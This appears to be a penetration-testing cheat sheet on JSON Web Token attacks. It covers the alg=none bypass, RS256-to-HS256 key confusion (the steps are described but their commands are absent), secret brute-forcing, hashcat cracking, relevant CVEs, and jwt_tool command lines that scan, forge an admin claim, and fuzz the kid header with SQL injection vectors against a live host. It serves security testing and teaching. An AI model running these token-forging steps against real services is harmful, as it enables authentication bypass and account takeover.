JSON Web Token
JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed.
Summary
Tools
JWT Format
Header
Payload
JWT Signature - None algorithm
JWT Signature - RS256 to HS256
Breaking JWT's secret
JWT Tool
JWT cracker
Hashcat
References
Tools
JWT Format
JSON Web Token : Base64(Header).Base64(Data).Base64(Signature)
Example : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkFtYXppbmcgSGF4eDByIiwiZXhwIjoiMTQ2NjI3MDcyMiIsImFkbWluIjp0cnVlfQ.UL9Pz5HbaMdZCV9cS9OcpccjrlkcmLovL2A2aiKiAOY
Where we can split it into 3 components separated by a dot.
Header
Default algorithm is "HS256" (HMAC SHA256 symmetric encryption). "RS256" is used for asymmetric purposes (RSA asymmetric encryption and private key signature).
alg
Param Value
Digital Signature or MAC Algorithm
Requirements
HS256
HMAC using SHA-256
Required
HS384
HMAC using SHA-384
Optional
HS512
HMAC using SHA-512
Optional
RS256
RSASSA-PKCS1-v1_5 using SHA-256
Recommended
RS384
RSASSA-PKCS1-v1_5 using SHA-384
Optional
RS512
RSASSA-PKCS1-v1_5 using SHA-512
Optional
ES256
ECDSA using P-256 and SHA-256
Recommended
ES384
ECDSA using P-384 and SHA-384
Optional
ES512
ECDSA using P-521 and SHA-512
Optional
PS256
RSASSA-PSS using SHA-256 and MGF1 with SHA-256
Optional
PS384
RSASSA-PSS using SHA-384 and MGF1 with SHA-384
Optional
PS512
RSASSA-PSS using SHA-512 and MGF1 with SHA-512
Optional
none
No digital signature or MAC performed
Required
Payload
Claims are the predefined keys and their values:
iss: issuer of the token
exp: the expiration timestamp (reject tokens which have expired). Note: as defined in the spec, this must be in seconds.
iat: The time the JWT was issued. Can be used to determine the age of the JWT
nbf: "not before" is a future time when the token will become active.
jti: unique identifier for the JWT. Used to prevent the JWT from being re-used or replayed.
sub: subject of the token (rarely used)
aud: audience of the token (also rarely used)
JWT Encoder – Decoder: http://jsonwebtoken.io
JWT Signature - None algorithm
JWT supports a None algorithm for signature. This was probably introduced to debug applications. However, this can have a severe impact on the security of the application.
None algorithm variants:
none
None
NONE
nOnE
To exploit this vulnerability, you just need to decode the JWT and change the algorithm used for the signature. Then you can submit your new JWT.
However, this won't work unless you remove the signature
Alternatively you can modify an existing JWT (be careful with the expiration time)
JWT Signature - RS256 to HS256
Because the public key can sometimes be obtained by the attacker, the attacker can modify the algorithm in the header to HS256 and then use the RSA public key to sign the data.
The algorithm HS256 uses the secret key to sign and verify each message. The algorithm RS256 uses the private key to sign the message and uses the public key for authentication.
Here are the steps to edit an RS256 JWT token into an HS256
Convert our public key (key.pem) into HEX with this command.
Generate HMAC signature by supplying our public key as ASCII hex and with our token previously edited.
Convert signature (Hex to "base64 URL")
Add signature to edited payload
Breaking JWT's secret
Encode/Decode JWT with the secret.
JWT tool
First, bruteforce the "secret" key used to compute the signature.
Then edit the field inside the JSON Web Token.
Finally, finish the token by signing it with the previously retrieved "secret" key.
Recon:
python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw
Scanning:
python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -M pb
Exploitation:
python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -X i -I -pc name -pv admin
Fuzzing:
python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -I -hc kid -hv custom_sqli_vectors.txt
Review:
python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -X i -I -pc name -pv admin
JWT cracker
Hashcat
Support added to crack JWT (JSON Web Token) with hashcat at 365MH/s on a single GTX1080 - src
CVE
CVE-2015-2951 - The alg=none signature-bypass vulnerability
CVE-2016-10555 - The RS/HS256 public key mismatch vulnerability
CVE-2018-0114 - Key injection vulnerability
CVE-2019-20933/CVE-2020-28637 - Blank password vulnerability
CVE-2020-28042 - Null signature vulnerability
References
Last updated